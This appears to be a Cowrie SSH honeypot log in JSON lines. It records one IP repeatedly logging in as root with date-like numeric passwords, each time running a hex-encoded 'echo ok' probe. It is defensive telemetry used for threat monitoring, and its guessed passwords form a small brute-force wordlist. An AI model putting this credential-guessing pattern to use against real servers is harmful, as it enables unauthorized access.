{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:27.980951Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
{"eventid":"cowrie.login.success","username":"root","password":"220583","message":"login attempt [root/220583] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.086814Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:28.187438Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.188163Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.219022Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.220050Z","src_ip":"212.227.125.160","session":"3d17250e8be4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42672,"dst_ip":"1.2.3.4","dst_port":22,"session":"e88dc079817e","protocol":"ssh","message":"New connection: 212.227.125.160:42672 (1.2.3.4:22) [session: e88dc079817e]","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.240717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.243337Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.263753Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.login.success","username":"root","password":"211183","message":"login attempt [root/211183] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.401456Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:28.542915Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.543610Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.567591Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.568729Z","src_ip":"212.227.125.160","session":"e88dc079817e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42676,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5e31fb74079","protocol":"ssh","message":"New connection: 212.227.125.160:42676 (1.2.3.4:22) [session: e5e31fb74079]","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.589538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.590438Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.614744Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.login.success","username":"root","password":"210980","message":"login attempt [root/210980] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.694844Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:28.819048Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.819758Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.852373Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.853461Z","src_ip":"212.227.125.160","session":"e5e31fb74079"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53812,"dst_ip":"1.2.3.4","dst_port":22,"session":"8725a6b9c116","protocol":"ssh","message":"New connection: 212.227.125.160:53812 (1.2.3.4:22) [session: 8725a6b9c116]","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.874444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.875059Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:28.901112Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.login.success","username":"root","password":"210781","message":"login attempt [root/210781] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.041761Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:29.113084Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.113904Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.138780Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.139882Z","src_ip":"212.227.125.160","session":"8725a6b9c116"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53820,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bb85890ab7c","protocol":"ssh","message":"New connection: 212.227.125.160:53820 (1.2.3.4:22) [session: 4bb85890ab7c]","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.160981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.161948Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.185761Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.login.success","username":"root","password":"21051987","message":"login attempt [root/21051987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.264601Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:29.387380Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.388081Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.411489Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.414370Z","src_ip":"212.227.125.160","session":"4bb85890ab7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53822,"dst_ip":"1.2.3.4","dst_port":22,"session":"676621d12351","protocol":"ssh","message":"New connection: 212.227.125.160:53822 (1.2.3.4:22) [session: 676621d12351]","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.433437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.465285Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.466095Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.login.success","username":"root","password":"210390","message":"login attempt [root/210390] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.686989Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:29.898318Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.899034Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.953315Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.954456Z","src_ip":"212.227.125.160","session":"676621d12351"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53836,"dst_ip":"1.2.3.4","dst_port":22,"session":"4be9384ce667","protocol":"ssh","message":"New connection: 212.227.125.160:53836 (1.2.3.4:22) [session: 4be9384ce667]","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.980374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:29.983612Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.044729Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.login.success","username":"root","password":"201089","message":"login attempt [root/201089] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.129693Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:30.208727Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.209413Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.233268Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.234366Z","src_ip":"212.227.125.160","session":"4be9384ce667"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53840,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ce650cc7549","protocol":"ssh","message":"New connection: 212.227.125.160:53840 (1.2.3.4:22) [session: 4ce650cc7549]","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.255170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.261811Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.296687Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.login.success","username":"root","password":"200187","message":"login attempt [root/200187] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.498880Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:30:30.633205Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.634200Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.684953Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.686047Z","src_ip":"212.227.125.160","session":"4ce650cc7549"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53844,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0f347a35f8d","protocol":"ssh","message":"New connection: 212.227.125.160:53844 (1.2.3.4:22) [session: d0f347a35f8d]","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.719089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:30:30.753599Z","src_ip":"212.227.125.160","session":"d0f347a35f8d"}
